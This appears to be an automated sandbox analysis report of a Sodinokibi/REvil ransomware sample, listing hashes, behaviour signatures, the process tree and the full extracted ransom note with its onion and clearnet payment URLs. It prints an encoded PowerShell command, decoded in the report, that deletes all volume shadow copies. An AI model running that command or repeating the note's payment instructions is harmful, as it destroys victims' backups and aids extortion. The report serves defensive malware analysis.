Analysis

  • max time kernel
    143s
  • max time network
    149s
  • platform
    windows7_x64
  • resource
    win7-20231129-en
  • resource tags

    arch:x64, arch:x86, image:win7-20231129-en, locale:en-us, os:windows7-x64, system
  • submitted
    06/05/2024, 19:43

General

  • Target

    1e13416a37f6abaa3abafc701760fe81_JaffaCakes118.exe

  • Size

    165KB

  • MD5

    1e13416a37f6abaa3abafc701760fe81

  • SHA1

    9b767c6c7aaace08c934f922ff3d9aae056fdb0a

  • SHA256

    b46db6bba1f77f8e3378b6f07a789d19500ae7dece3c09c10549a88b04f47867

  • SHA512

    ba75d54d07a2b57381d72e626a11f16ec17c6db5bf02ca004b10c8876703478f614596c37e083deaa98a7472efc0441ba2acebc8d57a430d9e0cc3c7c88d833f

  • SSDEEP

    3072:eCEq0R0nZ5ys5n4Y9doh7O79siUs/Na5dz7ZVMoJk71fC8:lw02sJPi7O93NqlVMoM

Malware Config

Extracted

Path

C:\Recovery\3y5ici9-readme.txt

Family

sodinokibi

Ransom Note
---=== Welcome. Again. ===---

[+] Whats Happen? [+]

Your files are encrypted, and currently unavailable. You can check it: all files on your computer has extension 3y5ici9. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER).

[+] What guarantees? [+]

Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practise - time is much more valuable than money.

[+] How to get access on website? [+]

You have two ways:

1) [Recommended] Using a TOR browser!
   a) Download and install TOR browser from this site: https://torproject.org/
   b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3624285A159EDA97

2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this:
   a) Open your any browser (Chrome, Firefox, Opera, IE, Edge)
   b) Open our secondary website: http://decryptor.top/3624285A159EDA97

Warning: secondary website can be blocked, thats why first variant much better and more available.

When you open our website, put the following data in the input form:

Key: 9gcHjDS+3VZ+/LWjfNpvBuysHKbCgzwVs3veHzATz9EOf9UdZ3tflOfsmccEbdgX DhQTiEJBef+52W9tBP9dGVszj3BXvjKN5BIFlUaDAXORCln23qZwULdMpk18yCaU VssilulINJw2M0SDBYcVYep9zz0MSvpm3+IUuWBRz3XUaS1r7Py1m7tuUIlFJIAq esHpGmxr22ZX8ZOnlTJjKl8nJ5YdvCCW/wDnJdh34w+HUf05F06ziH6lkChn2ZPG m/bnpSBlb+NHoTwBRWZaL5/YXMrQcJ77GF7d33IEADK8Mm/ymTF/N5VMnosDlwzp Vl8sB9+rEIovY95owvo/O9Tav9yWydidHKUNnArOOo23w/7arAFen2maIjhMCEvD 99cC5HCYJQ7ot75vledpN3X3ea73Yb8Xm/y393Ndtn21taGnFOKDQe2AeSzEnoHR yI7YE2xQILsbUOS650Ybwl2JpF6ibyfb4h/MTWUAeWMW1aJvt415FbT3vhfy5Qvq +i1fvHG4qickSM1zHXXDJ4js706n/EdvJvJqzYKXWmetc4TSa1ts2eFO7iyLA/rB FCh4BVmh4ZDydocJBWt9ii/CViQWg2YcL7VdAWURbXLQucq/LDiBjL9oWEhXw/k5 m1dZCnhoH1rf71p5afKu1zAtpfM8BWbJLc9J6fcS6psCwhWQ2XuwhmTTTv41Q1A7 NSU7e//o2xOYpYecU2jjKJ0W2HOxcKioJ8kZ76gAezROqATLLD0Pelwp6S6+N8yU futxqsu2ngF8oR11CpbcUk9sZDrgjMGYItelDvnVeb7xUZUK7hMgzCSimZKbgP8W qC/e+GV9xznaS8jVZ3t3dnrr326DU/r5aKMp8MzVy9oIXXtJfiHhUZ0NEvZcOXNg pwB/iy0L7DrjiYp2fEtrmkwbwjtPKnAWefi0HV1KM6qe/7UTWXnQRwsmguOVruHn dWgcwSqv+dJM5i3rP/jZfcic+JL1dRFE5EsdQ5SmJKeSNQBQFb5ixYW2Pf3lkuQ5 rpnjyjJBSIFBuQeWvWTg8RS2w5QshVurQmO6p8/KUl5GGPHLIL5e/B4kkFDnjWFc QYL7pllfUEyC9kE8UhBXwYaFvPLvw1B/Tp2v2fW09P+ECS1xACTyCmG9hWnfWKWo tChWhieatQ79FO1jb03caUFPM7GUEyCoTrNzpwpUUWuOw7PPWOgmV2lfNOgC2oVE f4SHCw4EYPKD1HSv3kI=

Extension name: 3y5ici9

--------------------------------------------------------------------------------------

!!! DANGER !!!
DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damge of the private key and, as result, The Loss all data.
!!! !!! !!!
ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere.
!!! !!! !!!
URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/3624285A159EDA97

http://decryptor.top/3624285A159EDA97

Signatures

  • Sodin,Sodinokibi,REvil

    Ransomware with advanced anti-analysis and privilege escalation functionality.

  • Adds Run key to start application (2 TTPs, 1 IoCs)
  • Enumerates connected drives (3 TTPs, 25 IoCs)

    Attempts to read the root path of hard drives other than the default C: drive.

  • Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
  • Drops file in Program Files directory (36 IoCs)
  • Modifies system certificate store (2 TTPs, 2 IoCs)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious use of AdjustPrivilegeToken (4 IoCs)
  • Suspicious use of WriteProcessMemory (4 IoCs)
  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Users\Admin\AppData\Local\Temp\1e13416a37f6abaa3abafc701760fe81_JaffaCakes118.exe
    "C:\Users\Admin\AppData\Local\Temp\1e13416a37f6abaa3abafc701760fe81_JaffaCakes118.exe"
    1⤵
    • Adds Run key to start application
    • Enumerates connected drives
    • Sets desktop wallpaper using registry
    • Drops file in Program Files directory
    • Modifies system certificate store
    • Suspicious behavior: EnumeratesProcesses
    • Suspicious use of WriteProcessMemory
    PID:2368
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -e RwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAFMAaABhAGQAbwB3AGMAbwBwAHkAIAB8ACAARgBvAHIARQBhAGMAaAAtAE8AYgBqAGUAYwB0ACAAewAkAF8ALgBEAGUAbABlAHQAZQAoACkAOwB9AA==
      (the -e argument is UTF-16LE base64; it decodes to: Get-WmiObject Win32_Shadowcopy | ForEach-Object {$_.Delete();} - i.e. deletion of all volume shadow copies, which is the behaviour behind the "Uses Volume Shadow Copy service COM API" signature above)
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2992
  • C:\Windows\system32\wbem\unsecapp.exe
    C:\Windows\system32\wbem\unsecapp.exe -Embedding
    1⤵
    PID:1468
    • C:\Windows\system32\vssvc.exe
      C:\Windows\system32\vssvc.exe
      1⤵
      • Suspicious use of AdjustPrivilegeToken
      PID:3000

Network

MITRE ATT&CK Enterprise v15


Downloads

  • C:\Recovery\3y5ici9-readme.txt
    Filesize: 6KB
    MD5: eaec106b5752dd1bd9e22ce63abd305f
    SHA1: 531ceaacc328f9c4308564cc26df76766d9d064c
    SHA256: 47f777f12ef26d4ee6052cd12dd1c220c904f8cc062fd90ef78f22cd0404d6ff
    SHA512: 228a0da2b3da12c28c3ea078fd5e146ed536153dbaa219a1a145ef23e01d05c041411935d72529f16f528349931d120ee2c168ceae7f2990b748d9bb87bdecf7

  • memory/2992-4-0x000007FEF589E000-0x000007FEF589F000-memory.dmp
    Filesize: 4KB

  • memory/2992-5-0x000000001B680000-0x000000001B962000-memory.dmp
    Filesize: 2.9MB

  • memory/2992-6-0x00000000021E0000-0x00000000021E8000-memory.dmp
    Filesize: 32KB

  • memory/2992-7-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
    Filesize: 9.6MB

  • memory/2992-8-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
    Filesize: 9.6MB

  • memory/2992-9-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
    Filesize: 9.6MB

  • memory/2992-10-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
    Filesize: 9.6MB

  • memory/2992-11-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
    Filesize: 9.6MB

  • memory/2992-12-0x000007FEF55E0000-0x000007FEF5F7D000-memory.dmp
    Filesize: 9.6MB